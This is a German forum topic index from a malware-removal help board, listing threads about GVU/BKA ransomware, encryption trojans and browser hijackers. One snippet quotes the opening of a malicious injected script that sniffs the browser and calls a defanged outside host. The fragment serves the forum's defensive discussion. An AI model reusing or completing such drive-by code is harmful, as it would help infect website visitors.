Zurück   Trojaner-Board > Themen

Alles zum Thema: Befinden

  Letzter Beitrag Antworten Hits Forum
GVU Trojaner eingefangen
Befinden - Hallo, ich habe mir den GVU- Trojaner eingefangen. Offline läuft der Rechner stabil und ohne Zwischenfälle, sowie ich jedoch online gehe klappt das altbekannte Fenster auf. Taskmanager funktioniert gar nicht mehr. Andere Auswirkungen habe ich bis jetzt noch nicht feststellen können. Im Anhang...
Log-Analyse und Auswertung
Win 7 nach GVU-Befall neuinstalliert - System nun absolut sauber?
Befinden - Hallo liebe Leute, vorgestern habe auch ich mir den GVU-Trojaner eingefangen. (welche Version kann ich nicht sagen) Was ich bisher gemacht habe: 1. einen riesen Schreck bekommen und alle Kabel am Router rausgezogen 2. ohne Internetzugang konnte ich normal auf meinem Rechner arbeiten. Ich...
Log-Analyse und Auswertung
Antivir Echtzeitscanner und Windows Update lassen sich nicht mehr aktivieren
Befinden - Hallo Leute! An meinem Notebook lassen sich der Antivir Echtzeitscanner und die Windows Update Funktion nicht mehr aktivieren. Systeminfos: Betriebssystemname Microsoft Windows XP Home Edition Version 5.1.2600 Service Pack 3 Build 2600 Betriebssystemhersteller Microsoft Corporation
Log-Analyse und Auswertung
GVU-Trojaner mit Webcam hat System blockiert, Vista 32bit
Befinden - Hallo, vor ca. 2 Wochen habe ich mir einen Trojaner eingefangen. Es ging eine Seite auf, die angeblich von der GVU ist und eine Strafandrohung machte. Gleichzeitig ging meine Webcam an. Welche Version es war, weiß ich leider nicht mehr, da ich beim ersten Schreck nicht darauf geachtet hatte. Den...
Plagegeister aller Art und deren Bekämpfung
Einheit 5.2 Trojaner (Bundespolizei hat Internet gesperrt)!
Befinden - Hallo Liebe Community! Wie oben beschrieben habe ich ich es irgendwie geschafft diesen blöden Trojaner auf meinem Laptop zu bekommen. Ich hab mich jetzt schon ein bisschen durch das Forum gewühlt und habe folgende Schritte befolgt. 1. Malewarebytes Anti-Maleware installiert! (Laptop wird...
Log-Analyse und Auswertung
ich hab gvu und was hast du?
Befinden - hallo ich habe schon mehrmals probleme mit dem gvu trojaner gehabt. laut eigener recherche handelt es sich um die v 2.7 habe malwarebytes und otl angewendet. die logfiles befinden sich im anhang. kann mir jemand weiterhelfen?
Plagegeister aller Art und deren Bekämpfung
GVU Trojaner - Computer gesperrt
Befinden - Hallo zusammen, mein Rechner hat sich ein GVU Trojaner eingefangen. Scheinbar gibt es unterschiedliche Versionen davon, bei meinem ist ein kleines Webcam Fenster oben rechts, allerdings nicht aktiviert. Zugriff auf den normalen Modus ist möglich indem ich über Strg,Alt,Entf. auf "abmelden"...
Plagegeister aller Art und deren Bekämpfung
Live Security Platinum
Befinden - Hallo miteinander, ich habe mich vor einigen Stunden mit Live Security Platinum und habe auch schon folgende Schritte (hier nachzulesen: Live Security Platinum entfernen , FixExe - wenn man keine EXE-Dateien mehr ausführen kann) durchgeführt, Malwarebytes Anti-Malware mit einem vollständigen...
Log-Analyse und Auswertung
TR/Sirefef.P.566; TR/Dldr.Phdet.E.43; TR/ATRAPS.Gen2 durch AntiVir gefunden
Befinden - Hallöchen, schonmal gleich vielen Dank im Voraus, dass ihr euch der ganzen Probleme annehmt. Nun mein Problem: Am Wochenende zeigte mir plötzlich AntiVir mehrere Warnungen an. Konkret handelte es sich dabei um die Trojaner aus der obigen Betreffzeile. Diese sind mittlerweile in Quarantäne. Sie...
Log-Analyse und Auswertung
BKA - Trojaner Reste nach Kaspersky Rescue CD ?
Befinden - hallo, ich habe folgendes problem: und zwar hab ich mir vor ein paar tagen diesen bka trojaner eingefangen nach dieser anleitung: "hxxp://support.kaspersky.com/de/viruses/solutions?qid=208641247" habe ich dann die kaspersky rescue cd benutzt und seitdem kann ich den pc auch wieder ganz normal...
Log-Analyse und Auswertung
Verschlüsselungstrojaner-Version 1.1401.
Befinden - Hallo, wie mir mehrmals geraten wurde, eröffne ich nun meinen eigenen Threat. also ich habe mir auch den Verschlüsselungstrojaner eingefangen.Bei mir ist es aber der etwas neuere, laut dem Forum ist es die Version 1.1401. Ich habe die Malewarebytes zweimal durchlaufen lassen, (Logfiles...
Plagegeister aller Art und deren Bekämpfung
Verschlüsselungs-Virus
Befinden - Hi, ich habe von meinem IT-Kollegen ein Notebook bekommen, an dem er sich leider schon versucht hat. Die Eigentümerin des Gerätes hat es dummerweise nicht als notwendig angesehen, einen Virenscanner auf dem Gerät zu installieren... Was mein Kollege genau gemacht hat, weiß ich leider nicht, ich...
Plagegeister aller Art und deren Bekämpfung
Onlinetvrecorder.com Virenverseucht.
Befinden - Tagchen bin beim Onlinetvrecorder angemeldet ne Feine sache... Nur wird seit heute die Seite von Avast gespert, wegen nem Trojaner der sich auf der Seite befinden soll... Vielleicht ist das ja interessant für euch??? Ist das was gefährliches oder kann ich auf die Seite ? Hab ja eh...
Diskussionsforum
Bundespolizei-Virus + OTL-Log
Befinden - http://www.trojaner-board.de/118762-bundespolizei-virus-otl-log.html Die Mods dürfen dieses Thema löschen, aufgrund eines ruckelns nach langem Warten is der Post 2 mal aufgetaucht. Um zum Thema zu gelangen, bitte auf Obigen Link klicken. Hoffe auf Verständnis Chris
Mülltonne
GVU-Trojaner blockiert zwar nichts mehr, aber ist bestimmt noch auf dem PC
Befinden - Hallo an alle, habe jetzt folgendes Problem und zwar hab ich mir heute diesen GVU-Trojaner eingefangen, weswegen ich schon den ganzen Tag verzweifelt nach einer Lösung suche. Die Kaspersky Rescue Disk hab ich mir auch schon gedownloaded und den PC damit gebootet, leider ohne Erfolg. Ich konnte...
Plagegeister aller Art und deren Bekämpfung
Searchnu.com/410 als Startseite
Befinden - Hallo zusammen, Ich habe mir vor 4 Tagen vermutlich einen Trojaner eingefangen. Wahrscheinlich ist es durch die Installation eines Free mp3 converters von Bandoo Media passiert. Ich werde nun diesen Trojaner nicht mehr los und wende mich darum hilfesuchend an euch und hoffe dass ihr mir...
Log-Analyse und Auswertung
Avast meldet Bedrohung "JS:lframe-FG (Trj)" nach Start von Firefox
Befinden - Guten Abend, seit heute Abend meldet mir Avast die im Betreff genannte Bedrohung, sobald ich den Firefox Browser starte. Beim Start von Opera meldet Avast nichts. Ich habe daraufhin mit Malwarebytes sowie ESET scannen lassen, jeodch ohne Befund. Anschließend habe ich die hier...
Plagegeister aller Art und deren Bekämpfung
PC stürzt regelmäßig ab, bin ratlos.
Befinden - Hallo zusammen, tjo wie der Titel schon sagt, schmiert mein PC in letzter Zeit regelmäßig ab. Viren habe ich bis jetzt nicht gefunden. Habe leider absolut keine Ahnung woran es liegen könnte. Habe defogger laufen lassen und nichts gefunden. Im Anhang befinden sich die Logs von OTL. Gmer...
Log-Analyse und Auswertung
Searchnu.com/410 als Startseite
Befinden - Hallo zusammen, Ich habe mir vor 4 Tagen vermutlich einen Trojaner eingefangen. Wahrscheinlich ist es durch das Herunterladen eines Free mp3 converters von Bandoo Media passiert. Ich werde nun diesen Trojaner nicht mehr los und wende mich darum hilfesuchend an euch und hoffe dass ihr mir...
Plagegeister aller Art und deren Bekämpfung
Fake Virusscanner
Befinden - Die Dateien werden von Webseiten heruntergeladen die diesen Code enthalten: < script > var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var...
Plagegeister aller Art und deren Bekämpfung
Externe HD hat den Verschlüsselungstrojaner
Befinden - Hallo :abklatsch: Ich wurde auch ein Opfer von diesen Verschlüsselungstrojaner (UKASH). Ich habe schon gestern eine Systemwiederherstellung von Laufwerk C: gemacht. Musste aber feststellen das mein Externe HD immer noch nicht lesbar ist, siehe Screen-Shot auf dieser externen HD befinden sich...
Log-Analyse und Auswertung
Frage zu Adminkonto wegen Virenbefall
Befinden - Hallo, ich brauche mal wieder eure Hilfe. Undzwar hab ich letztens wahrscheinlich nur mein Adminkonto mit einem Virus infiziert. Da hat sich bei einer Programminstalltion aus dem Internet etwas festgesetzt was auch von MBAM entfernt wurde. Das Programm wurde unter einem eingeschränkten Konto...
Alles rund um Windows
Verschlüsselungs-Trojaner Log-Files
Befinden - Hallo, bei mir erscheint seit heute auch das Bild und mein PC ist komplett gesperrt. Im Anhang befinden sich die gewünschten Log-Files.
Log-Analyse und Auswertung
Infiziert mit Windows-Update-Trojaner
Befinden - Guten Tag, ich habe mich ebenfalls mit dem Windows-Update-Trojaner infiziert. Daraufhin habe ich zuerst mit der AVG-Rescue-CD einen Suchlauf gestartet, der jedoch keine Abhilfe geschaffen hat. Danach habe ich mit Antivir ebenfalls Suchläufe gestartet und diverse infizierte Dateien gefunden und...
Log-Analyse und Auswertung
Windows Verschlüsselungs Trojaner (E-Mail Mahnung)
Befinden - Hallöchen, vor einigen Tagen öffnete meine Freundin den Anhang einer Mahnungs-Mail, daraufhin öffnete sich ein Fenster, in welchem steht, dass ich mich mit einem Verschlüsselungs Trojaner infiziert habe und einen 50€ Code eingeben solle. Ich habe mich hier im Board bereits schlau gemacht, wie...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.